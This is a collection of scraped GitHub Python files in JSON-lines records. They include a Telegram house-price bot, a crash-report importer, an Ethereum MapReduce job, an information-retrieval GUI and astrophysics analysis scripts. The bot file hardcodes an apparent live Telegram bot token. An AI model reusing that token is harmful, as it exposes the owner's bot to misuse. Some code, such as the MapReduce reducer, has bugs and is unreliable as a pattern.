'GARAGE' : context.user_data['garage'],\n 'LAND_AREA' : context.user_data['land_area'],\n 'FLOOR_AREA' : context.user_data['floor_area'],\n 'BUILD_YEAR' : context.user_data['anno'],\n 'CBD_DIST' : context.user_data['distanza'],\n 'NEAREST_STN' : context.user_data['nomestazione'],\n 'NEAREST_STN_DIST' : context.user_data['distanzastazione'],\n 'DATE_SOLD' : context.user_data['datavendita'],\n 'POSTCODE': context.user_data['codicepostale'],\n 'LATITUDE': context.user_data['latitude'],\n 'LONGITUDE': context.user_data['longitude'],\n 'NEAREST_SCH': context.user_data['nomescuola'],\n 'NEAREST_SCH_DIST': context.user_data['distanzascuola'],\n 'NEAREST_SCH_RANK': context.user_data['grado']}\n df = pd.DataFrame(dictionary, index=[0])\n df['ADDRESS'] = df['ADDRESS'].astype(\"category\", errors='raise').cat.codes\n df['SUBURB'] = df['SUBURB'].astype(\"category\", errors='raise').cat.codes\n df['NEAREST_STN'] = df['NEAREST_STN'].astype(\"category\", errors='raise').cat.codes\n df['DATE_SOLD'] = df['DATE_SOLD'].astype(\"category\", errors='raise').cat.codes\n df['NEAREST_SCH'] = df['NEAREST_SCH'].astype(\"category\", errors='raise').cat.codes\n context.user_data['dati_inviati'] = 0\n file = open('modello', 'rb')\n modello = pickle.load(file)\n risultato = modello.predict(df)\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Il prezzo è\" + str(risultato))\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Devi inserire un numero intero.\")\n\n\n# main\nif __name__ == '__main__':\n # token del bot\n TOKEN = \"6181502382:AAFroZvfszc6PFydtBosUKrEurgyvuSIDek\"\n # creazione dell'oggetto bot\n bot = telegram.Bot(TOKEN)\n\n # creazione dell'updater\n updater = Updater(TOKEN, use_context=True)\n\n # aggiunta dei gestori di comando e di messaggi di testo\n updater.dispatcher.add_handler(CommandHandler('start', start))\n updater.dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, text_message))\n\n # avvio del bot\n updater.start_polling()\n updater.idle()","repo_name":"samu0411/PredizioneCase","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10125,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"86279477301","text":"from datetime import datetime\nfrom email.utils import parsedate_to_datetime\nfrom hashlib import sha256\n\nfrom .message import Message\n\n\nclass DatabaseEntry:\n def __init__(self, rfc822_message):\n self.message = Message(rfc822_message)\n\n # from is just needed for calculating the SHA256 hash below\n self.from_ = rfc822_message[\"from\"]\n self.to = rfc822_message[\"to\"]\n\n self.plaintext = self.message.plaintext\n self.newpipe_exception_info = self.message.embedded_json\n\n try:\n # try to use the date given by the crash report\n self.date = datetime.strptime(\n self.newpipe_exception_info[\"time\"], \"%Y-%m-%d %H:%M\"\n )\n if self.date.year < 2010:\n raise ValueError()\n except ValueError:\n # try to use the date from the mail header\n self.date = parsedate_to_datetime(rfc822_message[\"date\"])\n if self.date.year < 2010:\n self.date = self.message.date_from_received_headers()\n print(self.date)\n\n def to_dict(self):\n # we don't store the From header, as it's not needed for potential re-imports of the database, but could be\n # used to identify the senders after a long time\n # in fact, senders weren't stored in the production system either, but this never got committed to the\n # repository... D'oh!\n return {\n \"to\": self.to,\n \"timestamp\": int(self.date.timestamp()),\n \"plaintext\": self.plaintext,\n \"newpipe-exception-info\": self.newpipe_exception_info,\n }\n\n def hash_id(self):\n hash = sha256((str(self.from_) + str(self.to)).encode())\n hash.update(self.date.strftime(\"%Y%m%d%H%M%S\").encode())\n return hash.hexdigest()\n\n def __hash__(self):\n return hash((self.from_, self.to, self.date))\n","repo_name":"TeamNewPipe/CrashReportImporter","sub_path":"newpipe_crash_report_importer/database_entry.py","file_name":"database_entry.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"42564304652","text":"import sys\n\ninput = sys.stdin.readline\n\nMAX_NUM = 9998\n\nprimes = [False, False] + [True] * (MAX_NUM-1)\nfor i in range(2, MAX_NUM+1):\n if primes[i]:\n for j in range(2*i, MAX_NUM+1, i):\n primes[j] = False\n\nfor _ in range(int(input())):\n n = int(input())\n for i in range(n//2, MAX_NUM+1):\n if primes[i] and primes[n-i]:\n print(n-i, i)\n break","repo_name":"jsbin0526/boj","sub_path":"9020.py","file_name":"9020.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33068139237","text":"import argparse\nimport glob\nimport json\nimport os\nimport numpy as np\nfrom typing import Generator, List, Callable, Optional, Union\n\nimport tqdm\n\nfrom ocr4all_pixel_classifier.lib.dataset import DatasetLoader, SingleData\nfrom ocr4all_pixel_classifier.lib.postprocess import vote_connected_component_class\nfrom ocr4all_pixel_classifier.lib.predictor import Predictor, PredictSettings, Prediction\nfrom ocr4all_pixel_classifier.scripts.generate_image_map import load_image_map_from_file\n\n\ndef glob_all(filenames):\n return [g for f in filenames for g in glob.glob(f)]\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--load\", type=str, required=True,\n help=\"Model to load\")\n parser.add_argument(\"--char_height\", type=int, required=False,\n help=\"Average height of character m or n, ...\")\n parser.add_argument(\"--target_line_height\", type=int, default=6,\n help=\"Scale the data images so that the line height matches this value (must be the same as in training)\")\n parser.add_argument(\"--output\", required=True,\n help=\"Output dir\")\n parser.add_argument(\"--binary\", type=str, required=True, nargs=\"+\",\n help=\"directory name of the binary images\")\n parser.add_argument(\"--images\", type=str, required=True, nargs=\"+\",\n help=\"directory name of the images on which to train\")\n parser.add_argument(\"--norm\", type=str, required=False, nargs=\"+\",\n help=\"directory name of the norms on which to train\")\n parser.add_argument(\"--keep_low_res\", action=\"store_true\",\n help=\"keep low resolution prediction instead of rescaling output to orignal image size\")\n parser.add_argument(\"--cc_majority\", action=\"store_true\",\n help=\"classify all pixels of each connected component as most frequent class\")\n parser.add_argument(\"--color_map\", type=str, required=True,\n help=\"color_map to load\")\n parser.add_argument(\"--gpu_allow_growth\", action=\"store_true\")\n args = parser.parse_args()\n\n os.makedirs(args.output, exist_ok=True)\n\n image_file_paths = sorted(glob_all(args.images))\n binary_file_paths = sorted(glob_all(args.binary))\n\n norm_file_paths = sorted(glob_all(args.norm)) if args.norm else []\n\n if len(image_file_paths) != len(binary_file_paths):\n raise Exception(\"Got {} images but {} binary images\".format(len(image_file_paths), len(binary_file_paths)))\n\n print(\"Loading {} files with character height {}\".format(len(image_file_paths), args.char_height))\n\n if not args.char_height and len(norm_file_paths) == 0:\n raise Exception(\"Either char height or norm files must be provided\")\n\n if args.char_height:\n line_heights = [args.char_height] * len(image_file_paths)\n elif len(norm_file_paths) == 1:\n line_heights = [json.load(open(norm_file_paths[0]))[\"char_height\"]] * len(image_file_paths)\n else:\n if len(norm_file_paths) != len(image_file_paths):\n raise Exception(\"Number of norm files must be one or equals the number of image files\")\n line_heights = [json.load(open(n))[\"char_height\"] for n in norm_file_paths]\n\n post_processors = []\n if args.cc_majority:\n post_processors += [vote_connected_component_class]\n\n image_map = load_image_map_from_file(args.color_map)\n\n predictions = predict(args.output,\n binary_file_paths,\n image_file_paths,\n image_map,\n line_heights,\n target_line_height=args.target_line_height,\n model=args.load,\n high_res_output=not args.keep_low_res,\n post_processors=post_processors,\n gpu_allow_growth=args.gpu_allow_growth,\n )\n\n for _, _ in tqdm.tqdm(enumerate(predictions)):\n pass\n\n\ndef predict(output,\n binary_file_paths: List[str],\n image_file_paths: List[str],\n color_map: dict,\n line_heights: Union[List[int], int],\n target_line_height: int,\n model: str,\n high_res_output: bool = True,\n post_processors: Optional[List[Callable[[np.ndarray, SingleData], np.ndarray]]] = None,\n gpu_allow_growth: bool = False,\n ) -> Generator[Prediction, None, None]:\n dataset_loader = DatasetLoader(target_line_height, prediction=True, color_map=color_map)\n\n if type(line_heights) is int:\n line_heights = [line_heights] * len(image_file_paths)\n\n data = dataset_loader.load_data(\n [SingleData(binary_path=b, image_path=i, line_height_px=n)\n for b, i, n in zip(binary_file_paths, image_file_paths, line_heights)]\n )\n\n settings = PredictSettings(\n network=os.path.abspath(model),\n output=output,\n high_res_output=high_res_output,\n post_process=post_processors,\n color_map=color_map,\n n_classes=len(color_map),\n gpu_allow_growth=gpu_allow_growth,\n )\n predictor = Predictor(settings)\n\n return predictor.predict(data)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"OMMR4all/ommr4all-page-segmentation","sub_path":"ocr4all_pixel_classifier/scripts/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"6584812102","text":"from mrjob.job import MRJob\nimport time\nimport re\n\nclass ForktheChain(MRJob):\n\n def mapper(self, _, line):\n fields = line.split(\",\")\n chosen_timeframe = False\n try:\n if (len(fields)==7):\n value = int(fields[3])\n destination_address = str(fields[2])\n\n date = int(fields[6])\n timeformatting = time.strftime(\"%d %b %Y\", time.gmtime(date))\n\n start_time = time.strptime(\"23 Nov 2016\", \"%d %b %Y\")\n end_time = time.strptime(\"23 Jan 2017\", \"%d %b %Y\")\n\n if (start_time <= time.gmtime(date) and time.gmtime(date) <= end_time):\n chosen_timeframe = True\n else:\n chosen_timeframe = False\n\n if not (destination_address == \"null\" or value == 0):\n if (chosen_timeframe == True):\n yield(timeformatting, (destination_address, value))\n except:\n pass\n\n\n\n def reducer(self, date, values):\n for x in values:\n totalvalue = totalvalue + int(x[1])\n val0 = x[0]\n yield(val0, ('{},{}'.format(totalvalue, date)))\n\n\nif __name__ == '__main__':\n ForktheChain.JOBCONF = {'mapreduce.job.reduces': '25'}\n ForktheChain.run()\n","repo_name":"usmanjameel1/Analysis-of-Ethereum-Transactions-and-Smart-Contracts","sub_path":"ForktheChain.py","file_name":"ForktheChain.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32327283695","text":"import re\r\nfrom nltk.stem import PorterStemmer\r\nfrom nltk.tokenize import word_tokenize\r\nfrom tkinter import *\r\nfrom PIL import ImageTk,Image\r\n\r\n\r\nclass Boolean_retrieval:\r\n \r\n positional_index={}\r\n inverted_index={}\r\n stopwords=[]\r\n \r\n def __init__(self):\r\n #initializing stopwords to the class variable returned from stopwords function\r\n self.stopwords=self.readstopword() \r\n \r\n #reading stop words from file\r\n def readstopword(self):\r\n #Reading Stopwords from Stopwords file\r\n f=open(\"Stopword.txt\",\"r\")\r\n stwd=f.read()\r\n #Removing 'Spaces\" and \\n from the words and making a list\r\n stwd=stwd.replace(\" \",\"\")\r\n stwd=stwd.split(\"\\n\")\r\n f.close()\r\n # return the stop words\r\n return stwd\r\n \r\n #reading the file and removing special characters and converting to lower case\r\n def treat_file(self,num):\r\n #Reading from File\r\n f = open(\"Abstracts\\\\\" +str(num)+\".txt\",\"r\")\r\n file1=f.read()\r\n #Removing numbers and special chanacters and converting to lower case\r\n file1=re.sub('[^A-Za-z0-9]+', ' ', file1).lower()\r\n f.close()\r\n return file1\r\n #removing stop words from the provided list\r\n def filter_stopwords(self,file_words,sw):\r\n #removing stop words in this function\r\n filtered_words=[]\r\n for words in file_words:\r\n if words not in sw:\r\n filtered_words.append(words) \r\n return filtered_words\r\n #applying stemming to the applied list and neglecting the words with length < 1\r\n def apply_stemming(self,filtered_words):\r\n # apply poter stemming from builtin library nltk\r\n ps = PorterStemmer()\r\n stemmed_list=[]\r\n for words in filtered_words:\r\n if(len(ps.stem(words))>1):\r\n stemmed_list.append(ps.stem(words))\r\n return stemmed_list\r\n \r\n #storing the file list in inverted index\r\n def Inverted_index(self,st_word,num):\r\n #creating inverted index from a set of list of words\r\n for word in st_word:\r\n if word not in self.inverted_index:\r\n self.inverted_index[word]=[num]\r\n elif word in self.inverted_index:\r\n self.inverted_index[word].append(num)\r\n \r\n #processing and creating inverted index the the entire 449 files by applying steeming,\r\n #removing stop words by calling the above functions\r\n def Create_Inverted_index(self):\r\n for x in range(1,449):\r\n file_words=[]\r\n \r\n #reading the file and cleaning it\r\n file_paragraph=self.treat_file(x)\r\n #removing numbers to\r\n file_paragraph=re.sub('[^A-Za-z]+', ' ', file_paragraph).lower()\r\n file_words=file_paragraph.split()\r\n \r\n filter_stop=[]\r\n #removing stop words\r\n filter_stop=self.filter_stopwords(file_words,self.stopwords)\r\n stem_list=[]\r\n #applying stemming\r\n stem_list=self.apply_stemming(filter_stop)\r\n #removing duplicates\r\n stem_list=list(dict.fromkeys(stem_list))\r\n #Creating inverted index\r\n self.Inverted_index(stem_list, x)\r\n \r\n #storing the inverted index in file\r\n f = open(\"inverted_index.txt\", \"w\")\r\n for key in sorted(self.inverted_index):\r\n f.write(key + '->' +str(self.inverted_index[key])+'\\n')\r\n f.close()\r\n\r\n \r\n #Performing Intersection or we can say AND operation between 2 list\r\n def andoperation(self,t1,t2):\r\n iresult=[value for value in t1 if value in t2]\r\n return iresult\r\n \r\n #PErforming not operation\r\n def notoperation(self,t1):\r\n iresult=[]\r\n for id in range (1,449):\r\n if id not in t1:\r\n iresult.append(id)\r\n return iresult\r\n \r\n \r\n #Performing Or operation\r\n def oroperation(self,t1,t2):\r\n iresult=sorted(list(set(t1) | set(t2)))\r\n return iresult\r\n \r\n #processing boolean queries and search from inverted index \r\n def boolean_query_process(self,query):\r\n #processing the boolean query\r\n ps = PorterStemmer()\r\n #defining the list of boolean operators\r\n operator_list=['AND','OR','NOT']\r\n #MAking a list of the querys and splitting the querry into tokens\r\n query_list=query.split()\r\n \r\n #applying stemming to query terms except boolean operators\r\n temp_dict={}\r\n \r\n for x in range (0,len(query_list)):\r\n if query_list[x] not in operator_list:\r\n word=query_list[x]\r\n query_list[x]=ps.stem(word.lower())\r\n temp_dict[query_list[x]]=self.inverted_index[query_list[x]]\r\n \r\n result=[]\r\n #checking the if the first term is a term and not a boolean query\r\n #storing the term as result so we can process linearly onwords\r\n if(query_list[0] != 'NOT'): \r\n result=temp_dict[query_list[0]]\r\n else:\r\n #if the first term is not operator \r\n result=self.notoperation(temp_dict[query_list[1]])\r\n for x in range (0,len(query_list)-1): \r\n n1=[]\r\n if(query_list[x] == 'AND'):\r\n if(query_list[x+1]=='NOT'):\r\n n1=self.notoperation(temp_dict[query_list[x+2]])\r\n result=self.andoperation(result, n1)\r\n else:\r\n result=self.andoperation(result,temp_dict[query_list[x+1]])\r\n elif(query_list[x]=='OR'):\r\n if(query_list[x+1]=='NOT'):\r\n n1=self.notoperation(temp_dict[query_list[x+2]])\r\n result=self.oroperation(result, n1)\r\n else:\r\n result=self.oroperation(result,temp_dict[query_list[x+1]])\r\n \r\n return result\r\n \r\n \r\n #creating positional index of the 449 file provided and treating the document from above methods\r\n def Create_positional_index(self):\r\n \r\n for doc_id in range (1,449):\r\n \r\n file_words=[]\r\n #reading the file and cleaning it\r\n file_paragraph=self.treat_file(doc_id)\r\n file_words=file_paragraph.split()\r\n ps = PorterStemmer()\r\n for x in range (0,len(file_words)):\r\n file_words[x]=ps.stem(file_words[x]) \r\n #Condition to check if the words are not stop words & numbers and their length > 1 \r\n if((file_words[x] not in self.stopwords) and (file_words[x].isnumeric()==False) and len(file_words[x])>1):\r\n \r\n #Now creating positional index\r\n if file_words[x] not in self.positional_index:\r\n self.positional_index[file_words[x]]={}\r\n self.positional_index[file_words[x]][doc_id]=[]\r\n self.positional_index[file_words[x]][doc_id].append(x+1)\r\n else:\r\n if doc_id not in self.positional_index[file_words[x]]:\r\n self.positional_index[file_words[x]][doc_id]=[]\r\n self.positional_index[file_words[x]][doc_id].append(x+1)\r\n else: \r\n self.positional_index[file_words[x]][doc_id].append(x+1)\r\n \r\n \r\n #storing the positional index in File\r\n f = open(\"positional_index.txt\", \"w\")\r\n for key in sorted(self.positional_index):\r\n f.write(key + '->' +str(self.positional_index[key])+'\\n') \r\n f.close()\r\n\r\n \r\n #processing the queries and searching in positional index\r\n def proximity_queries(self,query):\r\n ps = PorterStemmer()\r\n #creating tokens of the query\r\n query_list=word_tokenize(query)\r\n new_list=[]\r\n temp_dict={}\r\n result=[]\r\n \r\n #PRocessing the proximity query\r\n for word in query_list: \r\n word=ps.stem(word)\r\n if('/' in word): \r\n #Removing / from the digit\r\n new_list.append(word.strip('/'))\r\n else:\r\n new_list.append(word)\r\n temp_dict[word]=self.positional_index[word]\r\n \r\n \r\n #Fetching result \r\n for n in range (0,len(new_list)):\r\n if new_list[n].isdigit() == True:\r\n distance=int(new_list[n])+1\r\n for key in temp_dict[new_list[n-2]]:\r\n #checking the common documentids for both terms\r\n if key in temp_dict[new_list[n-1]]:\r\n #getting list of of locations of the terms from both of the document ids\r\n l1=temp_dict[new_list[n-2]][key]\r\n l2=temp_dict[new_list[n-1]][key]\r\n for x in range (0,len(l1)):\r\n for y in range (0,len(l2)):\r\n if(abs(l1[x]-l2[y])<=distance):\r\n result.append(key)\r\n \r\n #Removing duplicate documents \r\n result=list(dict.fromkeys(result))\r\n return result\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n#checking if the query is boolean or proximity\r\ndef check_query(query):\r\n operator='/'\r\n result=[]\r\n if operator in query:\r\n result= p1.proximity_queries(query)\r\n else:\r\n result= p1.boolean_query_process(query)\r\n #storing the output in file\r\n f=open(\"Outputfile.txt\",\"a\")\r\n f.write('Query is: '+ query + '\\n' + 'Result=>'+str(result) +'\\n')\r\n f.close()\r\n \r\n return result\r\n \r\n#this function is called when search button is pressed in GUI \r\ndef search():\r\n output.delete(\"1.0\",\"end\")\r\n output.insert(END,\"Terms found in Documents:\"+str(check_query(input1.get())))\r\n \r\n \r\n \r\np1=Boolean_retrieval()\r\n#creating inverted and positional index\r\nprint(\"Creating boolean and positional index\")\r\np1.Create_Inverted_index()\r\np1.Create_positional_index()\r\n\r\n\r\n#Making GUI\r\n#In TKinter to place a widget in any where on the screen we can use pack,place or grid\r\n\r\nwindow =Tk()\r\n\r\nwindow.title(\"Boolean Retireval Model Assignment-1\")\r\nwindow.minsize(width=700,height=800)\r\n\r\n#Padding the window and setting the Background Color\r\nwindow.config(padx=50,bg='#B7CADB')\r\n\r\n#Setting image\r\ncanvas=Canvas(width=724,height=501,bg='#B7CADB',highlightthickness=0)\r\nimg=PhotoImage(file=\"img1.png\")\r\ncanvas.create_image(362,250, image=img)\r\n\r\n#Roll no text field\r\nmy_label=Label(text=\"K19-0178 A-1 \",font=(\"Arial\",24),bg='#B7CADB')\r\nmy_label.place(relx=0.5,rely=0.55,anchor=\"center\")\r\n\r\n#Asking for query text field\r\nmy_label=Label(text=\"Enter Query: \",font=(\"Arial\",24,\"bold\"),bg='#B7CADB')\r\nmy_label.place(relx=0.5,rely=0.6,anchor=\"center\")\r\n\r\n\r\n#input field \r\ninput1=Entry(width=50,font=(\"Arial\",15))\r\ninput1.place(relx=0.5,rely=0.65,anchor=\"center\")\r\n\r\n#Button field\r\nbutton=Button(text=\"Search\",command=search,width=10,height=1,bg='#6FB2D2')\r\nbutton.place(relx=0.5,rely=0.7,anchor=\"center\")\r\n\r\n#Output field\r\noutput=Text(height=7,width=69,bg='#B7CADB')\r\noutput.insert(END,\"\")\r\noutput.place(relx=0.12,rely=0.75)\r\n\r\ncanvas.pack()\r\nwindow.mainloop()\r\n\r\n\r\n\r\n","repo_name":"ZainShakir/Boolean-Retrieval-Model---IR","sub_path":"k19_0178 A-1.py","file_name":"k19_0178 A-1.py","file_ext":"py","file_size_in_byte":11689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74175167869","text":"# coding:utf-8\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n#解题思路:二叉树层次遍历,实际上就是广度优先搜索BFS,遇到这种问题考虑使用辅助队列,辅助队列中\n#存储需处理的元素及其优先顺序\nclass Solution:\n # 返回从上到下每个节点值列表,例:[1,2,3]\n def PrintFromTopToBottom(self, root):\n # write code here\n queue = []\n res =[]\n if root is None:\n return []\n queue.append(root)\n while queue:\n node = queue.pop(0)\n res.append(node.val)\n if node.left!=None:\n queue.append(node.left)\n if node.right!=None:\n queue.append(node.right)\n return res\n\nif __name__ == '__main__':\n root = TreeNode(1)\n root.left = TreeNode(2)\n root.right = TreeNode(3)\n Solution = Solution()\n print(Solution.PrintFromTopToBottom(root))","repo_name":"xxxsssyyy/offer-Goal","sub_path":"22从上往下打印二叉树.py","file_name":"22从上往下打印二叉树.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"23608904874","text":"#Calculate the relationship between quenching time, stellar mass, and distance to host, replicating Weisz+ 2015, Figure 1\n\n#Run with\n#%run /home/christensen/Code/python/python_analysis/quench_v_distance.py\n#or, on quirm,\n#%run /home/christenc/Code/python/python_analysis/quench_v_distance.py\n#ipython --pylab\n\nimport matplotlib as mpl\nmpl.use('tkagg')\nimport numpy as np\nimport pynbody\nimport socket\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys, os, glob, pickle\nfrom scipy.interpolate import interp1d\nimport matplotlib.colors as colors\nimport matplotlib.gridspec as gridspec\n#import pickle_read\n#import distance_to_nearest_host\n\n# Read in a pickled data file for python 3\ndef pickle_read(file):\n\n objs = []\n f=open(file, 'rb')\n while 1:\n try:\n u = pickle._Unpickler(f)\n u.encoding = 'latin1'\n p = u.load()\n objs.append(p)\n #objs.append(pickle.load(f))\n except EOFError:\n break\n \n f.close()\n\n return pd.DataFrame(objs)\n\n# Matches the halos in the objs_pd file with the halo information from Ferah (m200)\n# see \"match_halos.py\" for development\ndef match_halos(objs_pd, fdmdata):\n smass_tol = 0.5 #fractional tolerance for the stellar mass\n vmass_tol = 0.9\n\n match_id = {'m200_haloid': 0}\n if not 'm200_haloid' in objs_pd.keys():\n objs_pd = objs_pd.join(pd.DataFrame(columns=match_id))\n \n for sim in pd.unique(objs_pd['sim']):\n objs_pd_sim = objs_pd[objs_pd['sim'] == sim].copy()\n for halo in np.sort(objs_pd_sim['haloid']):\n possible_match = (float(objs_pd_sim[objs_pd_sim['haloid'] == halo]['M_star']) < fdmdata[fdmdata['simname']==sim]['Mstar_z0']*(1 + smass_tol)) & (float(objs_pd_sim[objs_pd_sim['haloid'] == halo]['M_star']) > fdmdata[fdmdata['simname']==sim]['Mstar_z0']*(1 - smass_tol))& (float(objs_pd_sim[objs_pd_sim['haloid'] == halo]['mass']) < fdmdata[fdmdata['simname']==sim]['Mhalo_z0']*(1 + vmass_tol)) & (float(objs_pd_sim[objs_pd_sim['haloid'] == halo]['mass']) > fdmdata[fdmdata['simname']==sim]['Mhalo_z0']*(1 - vmass_tol))\n if sum(possible_match) == 0:\n print(sim, halo, 'XXX', float(objs_pd[(objs_pd['sim'] == sim) & (objs_pd['haloid'] == halo)]['M_star']), float(objs_pd[(objs_pd['sim'] == sim) & (objs_pd['haloid'] == halo)]['mass']), 'No Match')\n else:\n #print(fdmdata[fdmdata['simname']==sim][possible_match]['halogrp_z0'])\n arg_best_match = np.argmin(np.abs(fdmdata[fdmdata['simname']==sim][possible_match]['Mstar_z0'] - float(objs_pd_sim[objs_pd_sim['haloid'] == halo]['M_star'])))\n index_best_match = (fdmdata[fdmdata['simname']==sim][possible_match]).index[arg_best_match]\n objs_pd.loc[(objs_pd['sim'] == sim) & (objs_pd['haloid'] == halo),'m200_haloid'] = fdmdata.loc[index_best_match]['halogrp_z0']\n #print(sim, halo, fdmdata.loc[index_best_match]['halogrp_z0'], float(objs_pd[(objs_pd['sim'] == sim) & (objs_pd['haloid'] == halo)]['M_star']), fdmdata.loc[index_best_match]['Mstar_z0'], float(objs_pd[(objs_pd['sim'] == sim) & (objs_pd['haloid'] == halo)]['mass']), fdmdata.loc[index_best_match]['Mhalo_z0'])\n fdmdata.loc[index_best_match,'Mstar_z0'] = 0 #set stellar mass to zero so it\n\n return objs_pd\n \n#Calculates the distance to the nearest massive galaxy\ndef distance_to_nearest_host(tfiles,data):\n distances = []\n hostrvirs = []\n min_massiveHalo = 10**11.5\n sprev = ''\n tfile_it = -1 \n for i in range(len(data)):\n s = data['sim'].tolist()[i]\n\n print(s,data['haloid'].tolist()[i]) \n if s=='h148' or s=='h229' or s=='h242' or s=='h329': # if sat simulation, find distance to halo 1\n if s != sprev:\n tfile_it = tfile_it + 1\n sprev = s\n h1dist = data['h1dist'].tolist()[i]*0.6776942783267969\n distances.append(h1dist)\n \n h1rvir = data['Rvir'][(data.sim==s) & (data.haloid==1)].tolist()[0]*0.6776942783267969\n hostrvirs.append(h1rvir)\n \n else: # if field simulation, find distance to nearest massive DM halo (currently > 0.5e12.5 Msol)\n if s=='cptmarvel':\n path = '/home/akinshol/Data/Sims/cptmarvel.cosmo25cmb.4096g5HbwK1BH/cptmarvel.cosmo25cmb.4096g5HbwK1BH.004096.dir/cptmarvel.cosmo25cmb.4096g5HbwK1BH.004096'\n\n if s=='elektra':\n path = '/home/akinshol/Data/Sims/elektra.cosmo25cmb.4096g5HbwK1BH/elektra.cosmo25cmb.4096g5HbwK1BH.004096.dir/elektra.cosmo25cmb.4096g5HbwK1BH.004096'\n\n if s=='rogue':\n path = '/home/akinshol/Data/Sims/rogue.cosmo25cmb.4096g5HbwK1BH/rogue.cosmo25cmb.4096g5HbwK1BH.004096.dir/rogue.cosmo25cmb.4096g5HbwK1BH.004096'\n\n if s=='storm':\n path = '/home/akinshol/Data/Sims/storm.cosmo25cmb.4096g5HbwK1BH/storm.cosmo25cmb.4096g5HbwK1BH.004096/storm.cosmo25cmb.4096g5HbwK1BH.004096'\n\n if s != sprev:\n sim = pynbody.load(tfiles[tfiles_it])\n tfile_it = tfile_it + 1\n sprev = s \n h_dummy = sim.halos(dummy = True)\n loc = []\n rvir = []\n for AHFhalo in h_dummy:\n properties = AHFhalo.properties \n if (properties['mass'] > min_massiveHalo):\n# print('Halo id: ',properties['halo_id'])\n loc.append(np.array([properties['Xc']/properties['h'], properties['Yc']/properties['h'], properties['Zc']/properties['h']]))\n rvir.append(properties['Rvir'])\n \n loc = np.array(loc)\n rvir = np.array(rvir)\n\n properties = h_dummy[int(data['haloid'].tolist()[i])].properties\n distances.append(min(((properties['Xc'] - loc[:,0])**2 + (properties['Yc'] - loc[:,1])**2 + (properties['Zc'] - loc[:,2])**2)**(0.5)))\n minind = np.where((((properties['Xc'] - loc[:,0])**2 + (properties['Yc'] - loc[:,1])**2 + (properties['Zc'] - loc[:,2])**2)**(0.5)) == distances[-1])\n hostrvirs.append(rvir[minind]*0.6776942783267969)\n\n return np.array(distances),np.array(hostrvirs)\n\n\n\nif __name__ == '__main__': \n if (socket.gethostname() == \"quirm.math.grinnell.edu\"):\n prefix = '/home/christenc/Data/Sims/'\n outprefix = '/home/christenc/Figures/marvel/marvelJL'\n else:\n prefix = '/home/christensen/Storage2/UW/MolecH/Cosmo/'\n outprefix = '/home/christensen/Storage2/UW/MolecH/Cosmo/marvelJL'\n plt.figure(1)\n plt.clf()\n\n presentation = False\n if presentation:\n outbase = outprefix + '_pres_'\n plt.style.use(['default','/home/christenc/.config/matplotlib/presentation.mplstyle'])\n plt_width = 8 #inches\n aspect_ratio = 3.0/4.0\n legendsize = 16\n dpi = 200\n markersize = 100\n ms_scale = 1\n lw = mpl.rcParams['lines.linewidth'] - 1\n edgewidth = 1\n else:\n outbase = outprefix #+ 'marvel'\n plt.style.use(['default','/home/christenc/.config/matplotlib/article.mplstyle'])\n plt_width = 3.5 #inches\n aspect_ratio = 3.0/4.0\n legendsize = 5\n dpi = 300\n markersize = 25\n ms_scale = 0.25\n lw = mpl.rcParams['lines.linewidth']\n edgewidth = 0.7\n \n if (socket.gethostname() == \"ozma.grinnell.edu\"):\n dataprefix = '/home/christensen/Code/Datafiles/' \n else:\n dataprefix = '/home/christenc/Code/Datafiles/'\n f = open(dataprefix+'mstar_vs_mhalo_4Charlotte.txt', 'r')\n fdmdata = []\n for line in f:\n line = line.strip()\n columns = line.split()\n if len(columns) == 12 and columns[0] != 'Volume':\n source = {}\n source['simname'] = columns[0]\n source['halogrp_z0'] = int(columns[1])\n source['halogrp_Mpeak'] = int(columns[2])\n source['Mpeak_snap'] = float(columns[3])\n source['Mpeak'] = float(columns[4])\n source['Mhalo_z0'] = float(columns[5])\n source['Mstar_z0'] = float(columns[6])\n source['Mstar_z0_photo'] = float(columns[7])\n source['Mstar_Mpeak'] = float(columns[8])\n source['Mstar_Mpeak_z0'] = float(columns[9])\n source['Vmag'] = float(columns[10])\n source['type'] = columns[11] \n fdmdata.append(source)\n f.close()\n fdmdata = pd.DataFrame(fdmdata)\n\n \n tfile_base_cm = 'cptmarvel.cosmo25cmb.4096g5HbwK1BH'\n tfile_cm = prefix + 'cptmarvel.cosmo25cmb/cptmarvel.cosmo25cmb.4096g5HbwK1BH/cptmarvel.cosmo25cmb.4096g5HbwK1BH.004096/cptmarvel.cosmo25cmb.4096g5HbwK1BH.004096' #'cptmarvel.cosmo25cmb.4096g5HbwK1BH.004096'\n\n tfile_r = prefix + 'rogue.cosmo25cmb/rogue.cosmo25cmb.4096g5HbwK1BH/rogue.cosmo25cmb.4096g5HbwK1BH.004096/rogue.cosmo25cmb.4096g5HbwK1BH.004096'\n tfile_base_r = 'rogue.cosmo25cmb.4096g5HbwK1BH'\n\n tfile_e = prefix + 'elektra.cosmo25cmb/elektra.cosmo25cmb.4096g5HbwK1BH/elektra.cosmo25cmb.4096g5HbwK1BH.004096/elektra.cosmo25cmb.4096g5HbwK1BH.004096'\n tfile_base_e = 